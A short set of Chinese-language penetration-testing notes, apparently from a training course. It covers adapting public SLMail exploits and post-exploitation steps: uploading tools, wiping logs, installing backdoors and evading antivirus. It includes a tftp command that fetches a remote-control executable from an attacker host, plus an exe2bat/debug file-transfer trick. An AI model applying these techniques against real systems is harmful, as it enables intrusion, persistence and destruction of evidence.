網上公開的exp代碼,選擇可信賴的exp源,exploit-db,securityfocus,searchsploit,有能力修改exp(python,perl,ruby,c,c++.......)
類unix壞境下編譯
返回地址和環境不符合
反彈shell硬編碼了回鏈IP地址
緩沖區偏移量與我們的環境不符
目標IP硬編碼
如下測試
查找slmail的exp
把exp復制到當前目錄下進行修改測試
vim 638.py
vim 643.c
避免有害的exp,避免一錘子測試,滿足不同環境需要,了解漏洞遠離,修改溢出代碼
漏洞利用后階段:
上傳工具(linux-----netcat----curl---wget。windows-----缺少預裝的下載工具)
提權
擦除攻擊痕跡(中間件日志,系統日志)
安裝后門(dump密碼,內網滲透)
后漏洞利用階段(最大的挑戰-----殺軟,使用合法的遠控)
windows命令行不方便操作,最好能把遠程控制的軟件上傳到服務器上,方便后續操作
例如使用ftp來傳輸遠控(ftp就不演示了,簡單)
xp,03默認安裝了,08需要單獨添加,而且經常被邊界防火牆過濾
思路就是在kali生成一個遠控,或者其他更好的工具,本機開啟tftp服務,在windows命令行下下載kali本機的遠程控制工具(win:tftp -i 192.168.1.10 get xxsec.exe)
使用debug傳輸
匯編,反匯編,16進制dump工具,一次只能傳輸64k字節,可以使用upx壓縮文件
用exe2bat把二進制轉換成16進制的表示(exe2bat是windows程序,要用wine來執行)
exe2bat會把所有代碼都生成好,復制好這些代碼,除了最后兩行,最后兩行要在debug上操作
把復制好的代碼粘貼到windows的shell上,這時dir查看一下,能看到一個123.hexdir的文件
然后到debug了,把x.txt的倒數第二行粘貼到windows的shell里面執行(123.hex作為輸入,傳輸給debug)
完成后,dir查看會多出來一個1.DLL的文件
然后對它進行重命名
再次dir查看,遠控工具就上傳上去了
友情鏈接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn